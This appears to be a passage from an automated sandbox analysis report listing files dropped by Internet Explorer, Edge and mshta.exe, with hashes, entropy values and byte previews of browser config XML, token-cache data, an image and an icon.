                                                                                                                                              SHA-256:54168E4A3FEE675F978C5B5A6D84C6F9E1A26DFB6A4A2770E497DEBB4BABD57D
                                                                                                                                              SHA-512:16102FE6EAF57423D43F22CC389F9D803C169A3DE8894179B89C3D5A26966216B838988751B586BFFC2AFBFAA5CC577A6DD154E2C5907A60F05001B7D07414EB
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................S.=.]................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):9728
                                                                                                                                              Entropy (8bit):3.223006560276251
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:MwXyIN3VNOWmONPfTOhO2OXOd37OWOmOaOqOjOYGB:8QVNTmKfTQT2y37/D7T2SB
                                                                                                                                              MD5:9D350E57275C3A774EC9230DF603DC69
                                                                                                                                              SHA1:9F3F1EB4548343B1C287E68129ED51A32ACFD1E8
                                                                                                                                              SHA-256:AF98E65A8BF4CDC467EBB00716BE6D314F966C5693B1F2E7F060ECBFA646CBC8
                                                                                                                                              SHA-512:F871E981440E1EF5C923E87A70AA1D21400BEFD4E88BF1F9736467D687190D13C8B1D5D45BC830CACDC374D68B20A32915812A720BE343DE6789884E33AF5EAA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y......................................................................................... .re.]................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................X.......T.r.a.v.e.l.L.o.g...............................................................................................................T.L.0...................................................................................................
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3584
                                                                                                                                              Entropy (8bit):1.5572790239940184
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:rlxAF/DrEgm8GD7KFclXDrEgm8GD7qw9lpQA0tRdI:rkG80lTG8C9laA8c
                                                                                                                                              MD5:5BB95473CB63E4E111D8CE891638E1F9
                                                                                                                                              SHA1:480A7AC2FACF9F7BB8BDC54BCDBD1BC2A864F17B
                                                                                                                                              SHA-256:6DD686D162C38E8559965C9922BD1134659C3584EDAF8E93E314B6E88CBBE2AB
                                                                                                                                              SHA-512:A4976CF61DA269543C200F90552C447F28A5F5174508A3C9C75C495B5D034D2789423301D07CA08D882B629C60C39655B009F1B92840A7D537C627074FAAC6D7
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................`..G.]................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (312), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):354
                                                                                                                                              Entropy (8bit):5.069955832187721
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc41EhlDyVlDITD90/QL3WIZK0QhPP55VDHkEtMjwu:TMHdNMNxOEfOzEnWimI00OR5VbkEtMb
                                                                                                                                              MD5:126E8A8A1761F65FFD201FBB57849F35
                                                                                                                                              SHA1:E5F4921A8FBDF2FC3142629A7F23E490B72AB2BF
                                                                                                                                              SHA-256:EE9A63DBA1C0C82AD374F31AA20FD81B60594D324041444DBAD1C5F6FB977DEB
                                                                                                                                              SHA-512:FEACDAC96BA9083DF79E704E57C8F049549129DF31FE83DFEEFF9F974DC783BBEC46E10B67351348674BC231582797AEB1F4C4C32A3A7C44E95C0874D7B8C163
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x504c51b1,0x01db5dfd</date><accdate>0x504c51b1,0x01db5dfd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (310), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):352
                                                                                                                                              Entropy (8bit):5.100597824819587
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4fLGTkoDysDITD90/QL3WIZK0QhPP55kI5kU5EtMjwu:TMHdNMNxe2koOsEnWimI00OR5kak6Ety
                                                                                                                                              MD5:9462B7A3D7BB382FFDEEA6ECEE5777DB
                                                                                                                                              SHA1:1AD9917F784B3693868BFB896BBB156BC7728DEF
                                                                                                                                              SHA-256:E73C774DF098A70689FDA98E1570B3C735152A6554A6B619E1ACD112051EB656
                                                                                                                                              SHA-512:EF4EAC6B0D73B65066503B6DD50226FC3A53E3706EC07FF6A07B1C0AAEB6B3046C3FEA34F54F4687EE71C6A34E4A648BC62B6E8FB933DEA6CB8C2CF1C95B7D86
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x5044fec1,0x01db5dfd</date><accdate>0x5044fec1,0x01db5dfd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (316), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):358
                                                                                                                                              Entropy (8bit):5.086584034605337
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4GLbnDyXnDITD90/QL3WIZK0QhPP55yhBcEEtMjwu:TMHdNMNxvLbnOXnEnWimI00OR5mZEtMb
                                                                                                                                              MD5:9B202EC09D1BAC3DF66D974852505A76
                                                                                                                                              SHA1:445EB535ACED52EA0B3B4AB350FFDEEF4214492D
                                                                                                                                              SHA-256:7421C8B631F4F8CCE944EC6109FC84C8D5547C06F63F704783CD903305A94AE2
                                                                                                                                              SHA-512:DF841E3F3C2E3CD86F8666FC7EF4D777E98F3E14E338E598107AE75E3907E7C40AE895C776DB83FB093B4CEB5399153393C10E121BC8924CFFEBB61C0D99D19A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x504ec2d0,0x01db5dfd</date><accdate>0x504ec2d0,0x01db5dfd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):375
                                                                                                                                              Entropy (8bit):5.166876655465672
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltq08eDPOOKaihMNEOGDy6EOGDITD90/QL3WIZK0QhPP55cE5Es:TMHdNMNxtDPOOKa9NGO6NGEnWimI00OB
                                                                                                                                              MD5:6B40C8AD0EC30C892E1373897DA839B8
                                                                                                                                              SHA1:37B01B6FC641E9EA4A3AE2E488AD91060148B3F4
                                                                                                                                              SHA-256:6F5E2C82B13A5E49E5B0BB70F4155A901F3C93744000B30D770A933D9F86BD9D
                                                                                                                                              SHA-512:F7DB21C8BBC99984A61E94495696F5C25F8E23E0802D6E35F4E7FF51A509887F5A22430E4A74EE3F6FBFE7CC7F7C47DE6747574D1EE0A00FA58039B976489217
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://go.microsoft.com/fwlink/p/?LinkId=255142"/><date>0x50476fa0,0x01db5dfd</date><accdate>0x50476fa0,0x01db5dfd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Bing.url"/></tile></msapplication></browserconfig>..
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (306), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):348
                                                                                                                                              Entropy (8bit):5.084729704553882
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4JEY0DyYY0DITD90/QL3WIZK0QhPP55gE5EtMjwu:TMHdNMNxiEY0OYY0EnWimI00OR5d5Ety
                                                                                                                                              MD5:F1DC3C9DADE420D29B3FDA805CE73EE2
                                                                                                                                              SHA1:1F7002B327534A9B247FD4B62B2329DE962778A8
                                                                                                                                              SHA-256:6B5041D27FC5CBF6B4B503102F25FA7E386B3FED911BF19E48D2FCDF33DF533F
                                                                                                                                              SHA-512:F5B808230D3E01DC699866C99EA5B79DC6912D92CAC00AFB57C972264B1A621F1D101F1318B1DD349377564113190016C40864B3EE3D394935D0649FD39E8787
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x5049e0ef,0x01db5dfd</date><accdate>0x5049e0ef,0x01db5dfd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (312), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):354
                                                                                                                                              Entropy (8bit):5.101434187049326
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4UxGwbnDyXnDITD90/QL3WIZK0QhPP558K0QU5EtMjwu:TMHdNMNxhGwbnOXnEnWimI00OR58K07/
                                                                                                                                              MD5:C0B931910BA0F95ABFEE853A506AB1B7
                                                                                                                                              SHA1:35BA232B3EDF689CC9FAD5C6634265B670707D34
                                                                                                                                              SHA-256:CA2E4773DD75E3DC33077BB376E5F01A21B23A0A16C438EF40E64E38132154DC
                                                                                                                                              SHA-512:8431E5EEA107A4B6680F976A0ACCE3D3A0ECEEC8A3A0B3705190ACA75BB17CA3530904E085813C142BC389D1BA301B73A8A5CA8EFD3E5A6B049BE9998D4CAA88
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x504ec2d0,0x01db5dfd</date><accdate>0x504ec2d0,0x01db5dfd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (310), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):352
                                                                                                                                              Entropy (8bit):5.069524765370674
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4QunhlDyVlDITD90/QL3WIZK0QhPP55AkEtMjwu:TMHdNMNx0nfOzEnWimI00OR5xEtMb
                                                                                                                                              MD5:70CE34DC4900B306FCD0826E503236F9
                                                                                                                                              SHA1:936F17DCF9CCD00F15C1DDB773A712398D0D154C
                                                                                                                                              SHA-256:A4DDB9790CA66D8BD71F619E3808A1AA1FDEEC525B93C470B0DAAB64E5486F72
                                                                                                                                              SHA-512:9E37DE49CF66A53E60E782F135BE6999CC33BB0181A4797EBF1E843B446A3DB43210982597371A43E93DB99F7DF89D1CEF35A8DAEA7E620E379F0F95161A4C7F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x504c51b1,0x01db5dfd</date><accdate>0x504c51b1,0x01db5dfd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (312), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):354
                                                                                                                                              Entropy (8bit):5.126444204357851
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4oTEY0DyVlDITD90/QL3WIZK0QhPP556Kq5EtMjwu:TMHdNMNxxEY0OzEnWimI00OR56Kq5Ety
                                                                                                                                              MD5:DB693C7C6CD08765A71B9C4D54AFEA19
                                                                                                                                              SHA1:C48DBB3C2D2EC348AFE29FC350FE7F931D706026
                                                                                                                                              SHA-256:E85702D2CEF79BE20D240990558A6BD4C5BA546A0DCD0159D7D101C780E08A19
                                                                                                                                              SHA-512:05B4096149BCB20AF209D4D4678B1618CC50FCFE2674CBCD0080AB4B315A2191F461A0544E35DBB9F73683429D91B3D68C3B817CF217D84E3A36186F7EF16945
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x5049e0ef,0x01db5dfd</date><accdate>0x504c51b1,0x01db5dfd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (314), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):356
                                                                                                                                              Entropy (8bit):5.101911969907646
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4YX2nOEOGDy6EOGDITD90/QL3WIZK0QhPP5502CqEtMjwu:TMHdNMNxcONGO6NGEnWimI00OR5VEtMb
                                                                                                                                              MD5:089D0F4531194588A5D5C4BDB45D224D
                                                                                                                                              SHA1:BF75D441FA9D2F39FBED45A48E35CACD9D95C0EA
                                                                                                                                              SHA-256:3DD9D80C1589E93A1A4B4B4FC96CEDDE5DF3C48D8DC40E5499A916F3655CA991
                                                                                                                                              SHA-512:576BB0604A9B4F9B9935EBA7CF70C11F3191DC3262760230DFE6A3131994615A56A0F9109CEED49F3D02F3C419623932B4E2FE8F0C8A0A16C30EBD337BBD6B0E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x50476fa0,0x01db5dfd</date><accdate>0x50476fa0,0x01db5dfd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (310), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):352
                                                                                                                                              Entropy (8bit):5.070423822652363
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4InEY0DyYY0DITD90/QL3WIZK0QhPP55iwE5EtMjwu:TMHdNMNxfnEY0OYY0EnWimI00OR5e5Es
                                                                                                                                              MD5:F68DE61E948029ECE776FE4347FDBBA7
                                                                                                                                              SHA1:6612D5521F11B24364FFE7B90EE3D4CFCB7A574B
                                                                                                                                              SHA-256:349A95D3F83DE60F859D9E1A0F0E2C864D2DEC16648D0C3C07DBD8BDE2D8D80C
                                                                                                                                              SHA-512:256852DDEADA5667850C48C062CCE9DDBF93006CBB777CC662AB09D97DCE91CCC011DEE9482BCF0BCEED4AE8313ADEDB05C91C7C6176D992A415D6234B2B8232
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x5049e0ef,0x01db5dfd</date><accdate>0x5049e0ef,0x01db5dfd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2278
                                                                                                                                              Entropy (8bit):3.8505061374671805
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:uiTrlKxrgxNCxl9Il8uQyOB05zacy0FxGXP/d1rc:mZYmy80tiGxb
                                                                                                                                              MD5:5817733872329964D8D792C21E999B4E
                                                                                                                                              SHA1:CC41DB8901FDF4494FFE45BB06533D0964342D9B
                                                                                                                                              SHA-256:3C5521A5A7F339FEB01B53E431FFBE1042FCFF87828A380FD25610CDFAD6533C
                                                                                                                                              SHA-512:07AA14E0647E0DEF861BA5AFF0863C69E3E49F920E56F92A10260277E5CD42DA1027D25E2C0F6037BB94C1CC8D7FE899FB1F3BA2E9F52CEBB84EFAD9F778D5CD
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.M.d.W.q.w.V.e.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.5.X.D.E.S.O.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4622
                                                                                                                                              Entropy (8bit):4.0033737118659225
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:QYmy8UZQZk3wfpQszvm0fBEDvEsvGNV2kPNUCSWVz:Q7tUZteQom06TqVHPOCFVz
                                                                                                                                              MD5:0CA6547E6CBC0DD5D93DBCB1A6CF125F
                                                                                                                                              SHA1:CD211730F9698745BF77DF3678B1BA02E3169590
                                                                                                                                              SHA-256:0D575CD564133DFA2C9AD60A0B99A01B0FD35D4C40C497BEA6CE82655043D8B1
                                                                                                                                              SHA-512:9DD67AE2D56FE44AA3246F01332E4541EAC239F17730BAF303CC44B70ADCA3896A94FF72FEBCBB94F93BEC9167AFE2FD9D517C0422A0F4DCBBC458D0B91FD91B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".L.A.5.X.k.f.1.d.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.5.X.D.E.S.O.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2684
                                                                                                                                              Entropy (8bit):3.8952253564009642
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:uiTrlKx68Wa7x8xl9Il8uQyIf0c1lQZ31KFi/76uX1TwXdn+uP+d1Gd/vc:aGYmyIf08QZ3QFi/WulTwXdnHP+d1D
                                                                                                                                              MD5:7D6F3ABF900718CD2EFD93EA06755721
                                                                                                                                              SHA1:0C653A63EB4A66B6B154809ED3594C756A35C09B
                                                                                                                                              SHA-256:6B84035942C2842F76D3313C856BC80CEA602ACEA6E3C0E43DEFCFB8CE7BE282
                                                                                                                                              SHA-512:07EBFA0BCEAB6AAB1867B96CBD41CE05F6D7A74B686FBF76F6EBB0496AD73A205E11E0077097E8970084EAF98873F948D6AF3A13BD72C099E9CBFB428EA92FC1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".B.L.N.d.w.s.5.8.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.5.X.D.E.S.O.
                                                                                                                                              Process:C:\Windows\System32\mshta.exe
                                                                                                                                              File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):452
                                                                                                                                              Entropy (8bit):7.0936408308765495
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:6v/7EljW8E6Cl2SYh8SZM4tf70FSDvMXDxJp6ScFChY9:U8hCl2SIdZBtAFSDUX/ozIhK
                                                                                                                                              MD5:C33DE66281E933259772399D10A6AFE8
                                                                                                                                              SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                                                                                                                                              SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                                                                                                                                              SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR...6...6............3PLTE.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?..".....tRNS.@0.`........ P.p`...../IDATx.....0...l..6....+...~yJ.F"....oE..L.3..[..i2..n.WyJ..z&.....F.......b....p~...|:t5.m...fp.i./e....%.%...n.P...enV.....!...,.......E........t![HW.B.g.R.\^.e..o+........%.&-j..q...f@..o...]... ....u0.x..2K.+C..8.U.L.Y.[=.....y...o.tF..]M..U.,4..........a.>/.)....C3gNI.i...R.=....Q7..K......IEND.B`.
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4286
                                                                                                                                              Entropy (8bit):3.8046022951415335
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
                                                                                                                                              MD5:DA597791BE3B6E732F0BC8B20E38EE62
                                                                                                                                              SHA1:1125C45D285C360542027D7554A5C442288974DE
                                                                                                                                              SHA-256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
                                                                                                                                              SHA-512:D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:...... .... .........(... ...@..... ...................................................................................................................................................................................................N...Sz..R...R...P...N..L..H..DG..........................................................................................R6..U...U...S...R...P...N..L..I..F..B...7...............................................................................S6..V...V...U...S...R...P...N..L..I..F..C...?..:z......................................................................O...W...V...V...U...S...R...P...N..L..I..E..C...?...;..{7..q2$..............................................................T..D..]...S)..p6..J...R...P...N..L..I..E..B..>..;..z7..p2..f,X.........................................................A..O#..N!..N!..N!..P$..q:...P...N..K..I..E..A..=..9..x5..n0..e,...5...................................................Ea.Z,..T$..T$..T
                                                                                                                                              Process:C:\Windows\System32\mshta.exe
                                                                                                                                              File Type:ASCII text, with very long lines (24050)
                                                                                                                                              Category:dropped
